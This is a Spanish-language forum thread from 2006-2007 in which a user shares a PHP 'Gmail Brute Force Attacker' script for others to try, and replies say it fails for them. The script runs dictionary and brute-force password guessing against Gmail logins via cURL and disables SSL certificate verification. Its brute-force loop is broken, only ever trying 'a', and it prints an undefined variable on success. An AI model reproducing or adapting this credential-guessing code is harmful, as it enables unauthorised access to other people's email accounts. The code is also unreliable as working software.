fuerza-bruta-gmail.php

detefix · December 09, 2006, 09:21:20 AM

Encontre por la red un script en php que sirve para sacar passwords de gmailpor fuerza bruta... A mi no me funciono pero pruebenlo ustedes y posteen sus observaciones.

Code Select

<?php

//////////////////////
////Gmail-Brute//////
///Mad-Hatter///////
//////////////////




////////////////////////
# This script was created to Brute Force G-Mail Logins,#
#it Uses CURL and 2 Methods of Login attacks (Brute Force and Dictionary) #
////////////////////////

$dic ="your Dictionary file here.txt";

///////////////////////



echo "
<title>Gmail Brute Force Attacker</title>
</head>
<style type='text/css'>
body {


font:Verdana, Arial, Helvetica, sans-serif;
font-size:12px;
border-color:#FFFFFF;
}
.raster_table {
background-color:#444444;
border-color:#CCCCCC;
}
.alert {
    color:#FF0000;
}
</style>
<body>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
<tr>
<td>
<div align='center'><b>Gmail Brute Force Attacker</b></div>
        </td>
    </tr>
</table>
<table cellpadding='0' cellspacing='0' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'>
           
            </div>
        </td>
    </tr>
    <tr>
        <td>
            <div align='center'>
            &nbsp;
            </div>
        </td>
    </tr>
    <tr>
        <td>
            <div align='center'>
                <form method='post'>
                    Username to brute:<br>
                    <input name='username' type='text' /><br><br>
                    <input name='attack' type='submit' value='dictionary' /> - <input name='attack' type='submit' value='brute' /><br>               
                </form>
            </div>
        </td>
    </tr>
    <tr>
        <td>
            <div align='center'>
            &nbsp;
            </div>
        </td>
    </tr>
</table>
";

// Sets variables and retrives google error for comparing
if(isset($_POST['attack']) && isset($_POST['username'])) {
    $username = $_POST['username'];
    $headers = array(
    "Host: mail.google.com",
    "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4",
    "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5",
    "Accept-Language: en-us,en;q=0.5",
    "Accept-Encoding: text", # No gzip, it only clutters your code!
    "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7",
    "Date: ".date(DATE_RFC822)
    );
    $c = curl_init('https://mail.google.com/mail/feed/atom');
    curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
    curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
    curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
    curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
    curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
    $wrong = curl_exec($c); // Get it
    curl_close($c); // Close the curl stream
}

//Dictionary Attack
if($_POST['attack'] == "dictionary") {
    $Dictionary = file("$dic");
    for ($Position = 0; $Position < count($Dictionary); $Position++) {
        $Dictionary[$Position] = str_replace("\r\n", "", $Dictionary[$Position]);
        if(check_correct($username, $Dictionary[$Position])) {
            die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
        </td>
    </tr>
</table>
</body>
</html>");
        }
    }
    echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the dictionary attack.</b></div>
        </td>
    </tr>
</table>";
}

//Brute Attack
elseif($_POST['attack'] == "brute") {
    for ($Pass = 0; $Pass < 2; $Pass++) {
        if ($Pass == 0){$Pass = "a";} elseif ($Pass == 1){ $Pass = "a"; }
        if(check_correct($username, $Pass)) {
            die("<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'><b>Found the password of: ".$Dictionary[$Position]."<br> For the account: ".$username."</b></div>
        </td>
    </tr>
</table>
</body>
</html>");
        }
    }
    echo "<table cellpadding='0' cellspacing='0' boreder='1' align='center' class='raster_table' width='75%'>
    <tr>
        <td>
            <div align='center'><b>Sorry... a password was not found for the account of <span class='alert'>".$username."</span> during the brute force attack.</b></div>
        </td>
    </tr>
</table>";
}
echo "</body>
</html>";

// Function for checking whether the username and password are correct
function check_correct($username, $password)
{
        global $wrong, $headers;
        $c = curl_init('https://'.$username.':'.$password.'@mail.google.com/mail/feed/atom');
        curl_setopt($c, CURLOPT_HTTPAUTH, CURLAUTH_ANY); // use authentication
        curl_setopt($c, CURLOPT_HTTPHEADER, $headers); // send the headers
        curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); // We need to fetch something from a string, so no direct output!
        curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1); // we get redirected, so follow
        curl_setopt($c, CURLOPT_SSL_VERIFYPEER, 0);
        curl_setopt($c, CURLOPT_SSL_VERIFYHOST, 1);
        curl_setopt($c, CURLOPT_UNRESTRICTED_AUTH, 1); // always stay authorised
        $str = curl_exec($c); // Get it
        curl_close($c);
        if($str != $wrong) {return true;}
        else {return false;}
}


?>

josealcuevas · December 10, 2006, 03:53:12 AM

lo habia visto ya, lo mas seguro es que no te funciono por que tu servidor no soporta cURL, eso eslo que explican en milw0rm

Komtec1

detefix · December 10, 2006, 04:06:17 AM

Quote from: Komtec1 on December 10, 2006, 03:53:12 AM
lo habia visto ya, lo mas seguro es que no te funciono por que tu servidor no soporta cURL, eso eslo que explican en milw0rm

Komtec1

ya lo probe en un servidor que soporta curl, pero aun asi no saca el password, porque hice una cuenta con una contraseña de las primeras que "testea" el script y nunca me dijo que esa era la contraseña

SergioDS · January 11, 2007, 08:44:00 PM

nose ami tampoco me funciona... pero seguro que algo hago mal

fuerza-bruta-gmail.php

detefix

josealcuevas

detefix

SergioDS